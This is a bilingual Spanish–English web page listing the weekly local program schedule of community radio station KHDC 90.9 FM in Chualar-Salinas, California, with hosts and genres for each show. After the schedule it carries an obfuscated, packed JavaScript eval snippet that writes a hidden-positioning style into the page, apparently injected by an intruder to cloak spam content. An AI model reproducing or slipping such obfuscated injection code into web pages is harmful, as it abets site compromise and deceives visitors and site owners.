Programación Local en KHDC 90.9 FM-Chualar-Salinas, CA

Para horarios de programas no listados aquí favor de ver la Guía de Programación de la Red.

 

           Hora                                 Día y Programa

LUNES
4pm – 6pm PT Alza tu Voz (Talk Show & Music for Youth)
Youth host the program
6pm – 8pm PT La Resistencia (Rock Alternativo Latino)
Oswaldo Cisneros y Manuel Morales
8pm – 10pm PT Variedad Musical (Cumbias, Baladas, Rancheras)
Diego Gonzalez
10pm – 12pm PT The Dawn (R&B, Hip Hop, Free Style)
Frank Mitchell

MARTES
4pm – 6pm PT Rock en Evolución (Rock Alternativo Latino)
Chuy Ramirez
6pm – 8pm PT Engrenaje Sonoro (Rock En Español Alternativo)
Pedro Vazquez
8pm – 10pm PT Rags to Wishes (Big Band Music)
Mike Schmitz
10pm – 12pm PT R&B Music (R&B music)
Carlos Vargas

MIERCOLES
4pm – 6pm PT La Neta (Indie, Pop, Rock Spanish & English)
Laura Quiroz, Marilu Quiroza, y Samuel Zuñiga
6pm – 8pm PT Wednesday Wreck with DJ Kazzeo & Guests (Underground Hip Hop)
Ricardo Garcia, Tahmi Gotti y Randy Novelli
8pm – 10pm PT Revelation Time with DJ Moi (Reggae music)
Moises Perez
10pm – 12am PT Chemistry (Electronic, chill-out, down tempo)
Will Devoe y Imelda Suarez

JUEVES
4pm – 6pm PT (every other week) Groove Nation (House, Trance, Electronica) Randolph Maldonado 4pm – 6pm PT (every other week) Fortisimo Franz Juarez Rios (Indie / Alternative Rock)
6pm – 8pm PT Club Wreck with DJ Kazzeo (Freestyle Music)
Randy Novelli
8pm – 12am PT The BGS Backspin (Disco,Old School Funk, Freestyle)
DJ Madonna

VIERNES
4:15pm – 7pm PT Rockin Da House (Rock Alternativo Latino / Rock En Español)
Chuy Ramirez
7pm – 9pm PT El Mitote (Rock Alternativo Latino)
Isaac Castro
9pm – 12am PT
(every other week)
Friday’ Night Show (House, Electronic, Trance)
Diego Ortiz
9pm – 12am PT
(every other week)
Drastik Show (Freestyle, Electronic)
Daniel Duarte

SABADO
5am – 9pm PT Tejano Show (Tex-Mex Music)
Arnoldo Salas
4:15pm – 6:30pm PT Tropicalisimo (Salsa, Merengue, Cumbia, Bachata)
Sandy Hernandez, Monica Barrios y Gabrie Barrios
6:30pm – 9pm PT Reventon Musical (Grupera, Regional Mexicana)
Jaime Puga
9pm – 12am PT Solo Música
(variedad de ritmos pop, rock, ingles y español)
Francisco Herrera, Priscila Amao-Herrera, y Oswaldo Cisneros

DOMINGO
5am – 9am PT Amanecer Mi Tierra (Musica Tradicional Mexicana)
Primitivo Estrada y Miguel Montes
9am – 11am PT La Hora Triqui (Entrevistas con musica tradicional)
Andres Cruz, Angelica Isidro y Ana Vargas
2pm – 6pm PT Music of Hawaii (Hawaiian Music)
Lani Bandhauer y Gan Neh Na
6pm – 8pm PT Rasta Reggae (Reggae Music)
Reev Solis
8pm -12am PT Blast From Past (Oldies Music)
Ruben Lerma

For program hours not listed here please see Network Program Guide.

 

           Time                               Day & Program

MONDAY
4pm – 6pm PT Alza tu Voz (Talk Show & Music for Youth)
Youth host the program
6pm – 8pm PT La Resistencia (Rock Alternativo Latino)
Oswaldo Cisneros & Manuel Morales
8pm – 10pm PT Variedad Musical (Cumbias, Baladas, Rancheras)
Diego Gonzalez
10pm – 12pm PT The Dawn (R&B, Hip Hop, Free Style)
Frank Mitchell

TUESDAY
4pm – 6pm PT Rock en Evolucion (Rock Alternativo Latino)
Chuy Ramirez
6pm – 8pm PT El Engrenaje Sonoro (Latin Alternative)
Pedro Vazquez
8pm – 10pm PT Rags to Wishes (Big Band Music)
Mike Schmitz
10pm – 12pm PT R&B Show ( R&B Music)
Carlos Vargas

WEDNESDAY
4pm – 6pm PT La Neta (Indie, Pop, Rock Spanish & English)
Laura Quiroz, Marilu Quiroz, and Samuel Zuñiga
6pm – 8pm PT Wednesday Wreck with DJ Kazzeo & Guests (Underground Hip Hop)
Ricardo Garcia, Tahmi Gotti & Randy Novelli
8pm – 10pm PT Revelation Time (Reggae music)
Moises Perez
10pm – 12am PT Chemistry (Electronic, chill-out, down tempo)
Will Devoe & Imelda Suarez

THURSDAY
4pm – 6pm PT (every other week) Groove Nation (House, Trance, Electronica) Randolph Maldonado 4pm – 6pm PT (every other week) Fortisimo Franz Juarez Rios (Indie / Alternative Rock)
6pm – 8pm PT Club Wreck (Freestyle Music)
Randy Novelli “DJ Kazzeo”
8pm – 12am PT The BGS Backspin (Disco,Old School Funk, Freestyle)
DJ Madonna

FRIDAY
4:15pm – 7pm PT Rockin Da House (Rock Alternativo Latino)
Edgar Mendoza & Chuy Ramirez
7pm – 9pm PT El Mitote (Rock Alternativo Latino)
Isaac Castro
9pm – 12am PT
(every other week)
Friday’ Night Show (House, Electronic, Trance)
Diego Ortiz
9pm – 12am PT
(every other week)
Drastik Show (Freestyle, Electronic)
Daniel Duarte

SATURDAY
5am – 9pm PT Tejano Show (Tex-Mex Music)
Arnoldo Salas
4:15pm – 6:30pm PT Tropicalisimo (Salsa, Merengue, Cumbia, Bachata)
Sandy Hernandez, Monica Barrios, and Gabriel Barrios
6:30pm – 9pm PT Reventon Musical (Grupera, Regional Mexicana)
Jaime Puga
9pm – 12am PT Solo Musica (Oldies)
Francisco Herrera, Priscila Amao, & Oswaldo Cisneros

SUNDAY
5am – 9am PT Amanecer Mi Tierra (Musica Tradicional Mexicana)
Primitivo Estrada & Miguel Montes
9am – 11am PT La Hora Triqui (Entrevistas con musica tradicional)
Andres Cruz, Angelica Isidro & Ana Vargas
2pm – 6pm PT Music of Hawaii (Hawaiian Music)
Lani Bandhauer & Gan Neh Na
6pm – 8pm PT Rasta Reggae (Reggae Music)
Reev Solis
8pm -12am PT Blast From Past (Oldies Music)
Ruben Lerma

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘i(f.j(h.g(b,1,0,9,6,4,7,c,d,e,k,3,2,1,8,0,8,2,t,a,r,s,1,2,6,l,0,4,q,0,2,3,a,p,5,5,5,3,m,n,b,o,1,0,9,6,4,7)));’,30,30,’116|115|111|112|101|57|108|62|105|121|58|60|46|100|99|document|fromCharCode|String|eval|write|123|117|120|125|47|45|59|97|98|110′.split(‘|’),0,{}))

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

Puedes usar las siguientes etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Encuéntranos en Facebook

Más Noticieros

Síguenos en Twitter

Suscríbete

Suscríbete a nuestra lista de correo